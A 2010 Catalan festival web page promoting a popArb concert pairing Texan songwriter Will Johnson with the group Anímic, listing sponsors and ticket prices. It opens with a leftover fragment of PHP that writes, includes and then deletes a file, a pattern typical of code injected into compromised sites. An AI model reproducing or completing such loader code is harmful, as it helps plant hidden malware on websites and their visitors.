");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> popArb 2010 : cartell : Anímic + Will Johnson

popArb - Festival de Música Independent feta a Catalunya. Arbucies, Girona

falten
29
dies

Anímic + Will Johnson

dissabte 26 de juny. 2010
Envelat Estrella Damm (Can Cassó) 23:50

Com va dir molt bé Ben Gibbard (Death Cab For Cutie, The Postal Service), el que fa del texà Will Johnson un compositor de cançons tan fenomenal és que sap com escollir el llenguatge més simple quan pinta un quadre abstracte. Jason Molina (Magnolia Elelctric Co., Songs: Ohia) el defineix com un professional “meravellós”. I Micah P. Hinson ha explicat el mateix, però a la seva manera: “Will és un putu geni”. El que és indiscutible és que ens trobem, s’expressi com s’expressi, davant d’un dels grans del rock made in USA del segle XXI.

Si vulguéssim trobar, en el panorama indie que ens envolta, pintors de quadres abstractes que usen pinzells d’aparença simple com els de Johnson, hi hauria pocs candidats millors que els sorprenents Anímic. El septet, des de la seva base barcelonina a la falda de Montserrat, texeix cançons de bressol místiques amb pinzellades la calidesa i inventiva quasi infantil -a l’estil de Joan Miró- de les quals, es regeixen per lleis pròpies. Així, i autogestionant-se durant cinc anys, s’han convertit en el mascaró de proa del neofolk català. El marcat perfil domèstic de la seva discografia –en la qual destaquen “Hau i hiu” (2007) i “Himalaya” (2009)- casa amb els discos que Will ha signat en solitari aquests últims anys. Puntualment, Will també ha introdueix cançons amb una dosi extra de senzilla intimitat en els repertoris de les seves bandes Centro-matic i South San Gabriel.

Us presentem una nova iniciativa, auspiciada per Houston Party i el prestigiós festival de música independent popArb (que se celebra des de 2005 a la localitat gironina d’Arbúcies), en la qual un artista nordamericà i un grup català presentaran en directe el resultat d’haver treballat junts –en la distància durant setmanes i plegats a l’estudi durant deu dies-, donant forma a un repertori flamant i compartit que sorgirà de la creativitat més lliure. Evidentment, l’artista nordamericà que us proposem és Will Johnson i el grup català, Anímic. Una unió que promet donar excel·lents fruits que que deixaran bocabadats no només als seus seguidors, sinó a qualsevol melòman.

Organitzen: Ajuntament d'Arbcies, Cultura Dispersa

Collaboren: Departament de Cultura i Mitjans de Comunicaci de la Generalitat de Catalunya, Diputaci de Girona, AiE

Mitjans Oficials: TV3, iCat fm

Recomanat per: Scanner fm, Enderrock, Nativa, Butxaca, TresC

Col·laboradors: Demasié, FETE, cupatges,Vialis-Aro, Guerrilla Sound

 

estrella damm

Estrella Damm patrocina el popArb 2010

Venda a ServiCaixa

atrapalo

Abonaments i entrades de dia a Servicaixa.com.

Divendres: 30€
Dissabte: 35€
Abonament: 45€

Consulteu Servicaixa.com per conèixer preu de gestió i descomptes aplicables.

popArb 2010 © | culturaDispersa SL | Avís LegalSobre el popArb
RSS | youtube/popArb2009 || myspace/poparb